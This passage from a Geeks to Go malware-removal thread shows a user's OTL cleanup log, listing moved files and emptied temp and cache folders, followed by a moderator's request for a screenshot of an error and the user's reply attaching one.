F:\Documents and Settings\Ken\.frostwire5\azureus\active\A76F4A518FB878E238525BEC8F3A94DB05B61694 folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\azureus\active\3605F4A1EADE6F2A02500AE63ECBD87C645B1241 folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\azureus\active folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\azureus folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\appwork\tmp folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\appwork\logs folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\appwork\cfg folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\appwork folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5 folder moved successfully.
F:\Documents and Settings\Ken\Desktop\UBCD4WinV360.exe moved successfully.
F:\Program Files\FrostWire 5\jre\lib\zi\SystemV folder moved successfully.
F:\Program Files\FrostWire 5\jre\lib\zi\Pacific folder moved successfully.
F:\Program Files\FrostWire 5\jre\lib\zi\Indian folder moved successfully.
F:\Program Files\FrostWire 5\jre\lib\zi\Europe folder moved successfully.
F:\Program Files\FrostWire 5\jre\lib\zi\Etc folder moved successfully.
F:\Program Files\FrostWire 5\jre\lib\zi\Australia folder moved successfully.
F:\Program Files\FrostWire 5\jre\lib\zi\Atlantic folder moved successfully.
F:\Program Files\FrostWire 5\jre\lib\zi\Asia folder moved successfully.
F:\Program Files\FrostWire 5\jre\lib\zi\Antarctica folder moved successfully.
F:\Program Files\FrostWire 5\jre\lib\zi\America\North_Dakota folder moved successfully.
F:\Program Files\FrostWire 5\jre\lib\zi\America\Kentucky folder moved successfully.
F:\Program Files\FrostWire 5\jre\lib\zi\America\Indiana folder moved successfully.
F:\Program Files\FrostWire 5\jre\lib\zi\America\Argentina folder moved successfully.
F:\Program Files\FrostWire 5\jre\lib\zi\America folder moved successfully.
F:\Program Files\FrostWire 5\jre\lib\zi\Africa folder moved successfully.
F:\Program Files\FrostWire 5\jre\lib\zi folder moved successfully.
F:\Program Files\FrostWire 5\jre\lib\servicetag folder moved successfully.
F:\Program Files\FrostWire 5\jre\lib\security folder moved successfully.
F:\Program Files\FrostWire 5\jre\lib\management folder moved successfully.
F:\Program Files\FrostWire 5\jre\lib\images\cursors folder moved successfully.
F:\Program Files\FrostWire 5\jre\lib\images folder moved successfully.
F:\Program Files\FrostWire 5\jre\lib\i386 folder moved successfully.
F:\Program Files\FrostWire 5\jre\lib\ext folder moved successfully.
F:\Program Files\FrostWire 5\jre\lib\cmm folder moved successfully.
F:\Program Files\FrostWire 5\jre\lib folder moved successfully.
F:\Program Files\FrostWire 5\jre\bin\server folder moved successfully.
F:\Program Files\FrostWire 5\jre\bin folder moved successfully.
F:\Program Files\FrostWire 5\jre folder moved successfully.
F:\Program Files\FrostWire 5 folder moved successfully.
F:\UBCD4Win\UBCD4WinBuilder.iso moved successfully.
F:\UBCD4Win\BartPE\PROGRAMS\ExpressBurn\expressburn.exe moved successfully.
F:\UBCD4Win\BartPE\PROGRAMS\sdfix\SDFix.exe moved successfully.
F:\UBCD4Win\BartPE\PROGRAMS\SysInfo\sysinfo.7z moved successfully.
F:\UBCD4Win\plugin\CDBurning\ExpressBurn\expressburn.exe moved successfully.
F:\UBCD4Win\plugin\Cleanup Tools\SDFix\SDFix.exe moved successfully.
F:\UBCD4Win\plugin\System-Info\Information\SysInfo\sysinfo.7z moved successfully.
F:\WINDOWS\system32\Process.exe moved successfully.
========== COMMANDS ==========
 
[EMPTYTEMP]
 
User: All Users
 
User: Default
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
 
User: Default User
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
 
User: Ken
->Temp folder emptied: 73816 bytes
->Temporary Internet Files folder emptied: 19525166 bytes
->Java cache emptied: 0 bytes
->FireFox cache emptied: 27680275 bytes
->Google Chrome cache emptied: 10508514 bytes
->Flash cache emptied: 506 bytes
 
User: Public
 
User: UpdatusUser
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
 
%systemdrive% .tmp files removed: 0 bytes
%systemroot% .tmp files removed: 0 bytes
%systemroot%\System32 .tmp files removed: 0 bytes
%systemroot%\System32\drivers .tmp files removed: 0 bytes
Windows Temp folder emptied: 88469126 bytes
%systemroot%\system32\config\systemprofile\Local Settings\Temp folder emptied: 0 bytes
%systemroot%\system32\config\systemprofile\Local Settings\Temporary Internet Files folder emptied: 0 bytes
RecycleBin emptied: 257536 bytes
 
Total Files Cleaned = 140.00 mb
 
 
OTL by OldTimer - Version 3.2.69.0 log created on 05222014_041016

Files\Folders moved on Reboot...
C:\Windows\temp\MpCmdRun.log moved successfully.

PendingFileRenameOperations files...

Registry entries deleted on Reboot...
 


  • 0

#14
Valinorum
Posted 22 May 2014 - 05:46 AM

Valinorum

    GeekU Guardian Bot

  • GeekU Moderator
  • 3,330 posts
This is a good news. Can you take a screenshot of the error and attach the picture here?
  • 0

#15
Kenjesse
Posted 22 May 2014 - 06:31 AM

Kenjesse

    Member

  • Topic Starter
  • Member
  • PipPip
  • 88 posts

Sreen capture is attached.

 

Capture.JPG


  • 0
Back to Virus, Spyware, Malware Removal · Next Unread Topic →




Similar Topics

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

  1. Geeks to Go Community
  2. Security
  3. Virus, Spyware, Malware Removal

As Featured On:

Microsoft Yahoo BBC MSN PC Magazine Washington Post HP